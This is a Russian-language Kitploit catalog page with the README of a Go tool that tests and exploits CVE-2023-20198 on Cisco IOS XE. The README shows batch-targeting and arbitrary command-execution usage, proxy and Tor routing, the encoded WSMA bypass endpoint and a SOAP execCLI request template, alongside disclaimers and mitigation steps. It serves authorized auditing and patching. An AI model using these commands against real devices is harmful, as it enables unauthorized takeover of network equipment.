Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cisco-cve-2023-20198-checker — Сканер уязвимостей на Go для обнаружения CVE-2023-20198 на устройствах Cisco IOS XE. Тестирует интерфейсы SOAP/XML (WSMA) на удаленное выполнение кода с пакетным сканированием и генерацией HTML-отчетов. | Kitploit
Инструменты/GitHubGitHub/gustavorobertux/cisco-cve-2023-20198-checker
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийСетевая безопасностьТестирование на ПроникновениеКомандование и Управление
GitHubgustavorobertux/cisco-cve-2023-20198-checker

cisco-cve-2023-20198-checker

Сканер уязвимостей на Go для обнаружения CVE-2023-20198 на устройствах Cisco IOS XE. Тестирует интерфейсы SOAP/XML (WSMA) на удаленное выполнение кода с пакетным сканированием и генерацией HTML-отчетов.

Репозиторий
36 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Cisco CVE-2023-20198 Checker

Go Version License Platform

Профессиональный сканер уязвимостей для обнаружения CVE-2023-20198 на устройствах Cisco IOS XE. Проверяет уязвимые интерфейсы SOAP/XML (WSMA). Предназначен для авторизованных оценок безопасности и аудита сети.

⚠️ Правовое заявление

ТОЛЬКО ДЛЯ АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ

Этот инструмент предназначен исключительно для:

  • Авторизованного сканирования уязвимостей
  • Аудита безопасности с явным письменным согласием
  • Оценок безопасности сети
  • Образовательных целей в контролируемых лабораторных средах
  • Тестирования на соответствие и проникновение

Несанкционированный доступ к компьютерным системам НЕЗАКОНЕН. Всегда убедитесь, что у вас есть соответствующие разрешения перед тестированием любых систем.


🚀 Быстрый старт

Установка

С помощью go install (рекомендуется)

root@kitploit:~
go install github.com/gustavorobertux/cisco-cve-2023-20198-checker@latest

Бинарный файл будет установлен в каталог $GOPATH/bin (обычно ~/go/bin).

Ручная установка

root@kitploit:~
# Клонирование репозитория
git clone https://github.com/gustavorobertux/cisco-cve-2023-20198-checker.git
cd cisco-cve-2023-20198-checker

# Сборка
go build -o cisco-cve-2023-20198-checker

# Установка (опционально)
sudo mv cisco-cve-2023-20198-checker /usr/local/bin/

Базовое использование

root@kitploit:~
# Проверка одной цели
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123

# Проверка нескольких целей
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin

# Генерация HTML-отчёта
cisco-cve-2023-20198-checker -target 10.0.0.1 -password secret -html

📋 Возможности

  • ✅ Обнаружение уязвимости — Тестирование CVE-2023-20198 (WSMA RCE)
  • ✅ Сканирование одиночных и пакетных целей
  • ✅ Поддержка нестандартных портов (по умолчанию: 443)
  • ✅ Выполнение команд через SOAP/XML
  • ✅ Профессиональная генерация HTML-отчётов
  • ✅ Нулевые внешние зависимости
  • ✅ Кроссплатформенность (Linux, macOS, Windows)
  • ✅ Опция пропуска проверки SSL/TLS
  • ✅ Настраиваемые таймауты
  • ✅ Поддержка прокси (HTTP, HTTPS, SOCKS5)
  • ✅ Аутентифицированные прокси
  • ✅ Поддержка переменных окружения (HTTP_PROXY, HTTPS_PROXY)

🌐 Поддержка прокси

Идеально подходит для корпоративных сред! Поддерживает:

  • HTTP/HTTPS прокси
  • SOCKS5 прокси (SSH-туннели, Tor)
  • Аутентифицированные прокси
  • Переменные окружения
root@kitploit:~
# HTTP прокси
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://proxy.company.com:8080

# SOCKS5 (SSH-туннель)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
  -proxy socks5://127.0.0.1:1080

# Переменная окружения
export HTTPS_PROXY=http://proxy.company.com:8080
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin

Подробную настройку прокси см. в PROXY_GUIDE.md.


💻 Параметры командной строки

ФлагТипПо умолчаниюОписание
-targetstring-IP-адрес/имя хоста одной цели
-targets-filestring-Файл с целями (по одной на строку)
-portint443Порт HTTPS/SOAP
-usernamestringadminИмя пользователя SOAP
-passwordstring-Обязательно. Пароль SOAP
-commandstringuname -aКоманда для выполнения
-htmlboolfalseГенерация HTML-отчёта
-timeoutint10Таймаут запроса (секунды)
-skip-verifybooltrueПропуск проверки SSL
-proxystring-URL прокси (http://, https://, socks5://)

📖 Примеры использования

Тестирование одной цели

root@kitploit:~
# Базовая проверка уязвимости
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123

# Нестандартный порт
cisco-cve-2023-20198-checker -target 10.0.0.1 -port 8443 -password secret

# Выполнение конкретной команды
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show version"

# Генерация отчёта
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin -html

Пакетное тестирование

root@kitploit:~
# Создание файла с целями
cat > targets.txt << EOF
192.168.1.100
10.0.0.1
172.16.0.50
EOF

# Тестирование всех целей
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin123

# Пакет с HTML-отчётом
cisco-cve-2023-20198-checker -targets-file devices.txt -password admin -html

Расширенные команды

root@kitploit:~
# Сетевая инвентаризация
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show ip interface brief"

# Определение версии
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show version"

# Через HTTP прокси
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://proxy.company.com:8080

# Через SOCKS5 прокси (SSH-туннель)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
  -proxy socks5://127.0.0.1:1080

# Аутентифицированный прокси
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://user:[email protected]:8080

🔧 О CVE-2023-20198

Детали уязвимости

CVE ID: CVE-2023-20198
Оценка CVSS: 10.0 (Критическая)
Тип: Удалённое выполнение кода (RCE)
Затрагиваемые продукты: Web UI Cisco IOS XE (WSMA)

Технические детали

  • Конечная точка: /%2577ebui_wsma_https (обход кодировки пути)
  • Протокол: SOAP 1.1 через HTTPS
  • Аутентификация: UsernameToken WS-Security (требуются действительные учётные данные)
  • Пространство имён: urn:cisco:wsma-exec
  • Влияние: Полный компрометация устройства при наличии действительных учётных данных

Структура SOAP-запроса

root@kitploit:~
<SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/">
    <SOAP:Header>
        <wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
            <wsse:UsernameToken>
                <wsse:Username>admin</wsse:Username>
                <wsse:Password>password</wsse:Password>
            </wsse:UsernameToken>
        </wsse:Security>
    </SOAP:Header>
    <SOAP:Body>
        <request xmlns="urn:cisco:wsma-exec">
            <execCLI>
                <cmd>COMMAND_HERE</cmd>
            </execCLI>
        </request>
    </SOAP:Body>
</SOAP:Envelope>

🛡️ Устранение

Для системных администраторов

Если ваши устройства уязвимы:

1. Отключите WSMA (если не требуется)

root@kitploit:~
no ip http server
no ip http secure-server

2. Ограничьте доступ с помощью ACL

root@kitploit:~
ip http access-class MGMT-ONLY
ip access-list standard MGMT-ONLY
  permit 10.0.0.0 0.0.0.255
  deny any log

3. Обновите прошивку — Примените последние патчи безопасности Cisco

4. Включите строгую аутентификацию

root@kitploit:~
aaa new-model
aaa authentication login default group tacacs+ local

5. Мониторинг логов — Отслеживайте подозрительную SOAP/HTTP активность


🏗️ Сборка из исходного кода

Предварительные требования

  • Go 1.21 или выше

Сборка

root@kitploit:~
# Стандартная сборка
go build -o cisco-cve-2023-20198-checker

# Оптимизированная (меньший бинарник)
go build -ldflags="-s -w" -o cisco-cve-2023-20198-checker

# Кросс-компиляция для разных платформ
GOOS=linux GOARCH=amd64 go build -o cisco-cve-2023-20198-checker-linux
GOOS=windows GOARCH=amd64 go build -o cisco-cve-2023-20198-checker.exe
GOOS=darwin GOARCH=arm64 go build -o cisco-cve-2023-20198-checker-mac-m1

📊 Примеры вывода

Вывод в терминал

root@kitploit:~
╔═══════════════════════════════════════════════════════════╗
║     Cisco SOAP/XML Security Checker                       ║
║     Educational & Authorized Security Assessment Only     ║
╚═══════════════════════════════════════════════════════════╝

[*] Command: show version
[*] Port: 443
[*] Timeout: 10 seconds

[1/1] Testing target: 192.168.1.100:443
[*] Sending SOAP request...
[+] Response received (Status: 200)
[+] Success!

╔═══════════════════════════════════════════════════════════╗
║                    BATCH RESULTS                          ║
╚═══════════════════════════════════════════════════════════╝

[✓] 192.168.1.100:443 - SUCCESS
Cisco IOS XE Software, Version 16.09.04...

╔═══════════════════════════════════════════════════════════╗
║                      SUMMARY                              ║
╚═══════════════════════════════════════════════════════════╝
Total Targets: 1
Successful: 1
Failed: 0

HTML-отчёт

Профессиональный отчёт об оценке безопасности, содержащий:

  • Панель статистики
  • Подробную конфигурацию
  • Вывод команд (в стиле терминала)
  • Технические метаданные
  • Правовые заявления

🤝 Участие в разработке

Приветствуются любые вклады! Пожалуйста:

  1. Сделайте форк репозитория
  2. Создайте ветку для новой функции
  3. Внесите свои изменения
  4. Отправьте pull request

📝 Лицензия

Лицензия MIT — см. файл LICENSE


🔗 Ссылки

  • Рекомендации Cisco по безопасности
  • Сведения о CVE-2023-20198
  • Безопасность API OWASP

⚖️ Ответственное раскрытие

Этот инструмент предназначен только для авторизованного сканирования уязвимостей. Авторы не несут ответственности за неправильное использование. Всегда получайте письменное разрешение перед тестированием систем, которые вам не принадлежат.


Сделано для сообщества специалистов по безопасности 🛡️

Скачать инструмент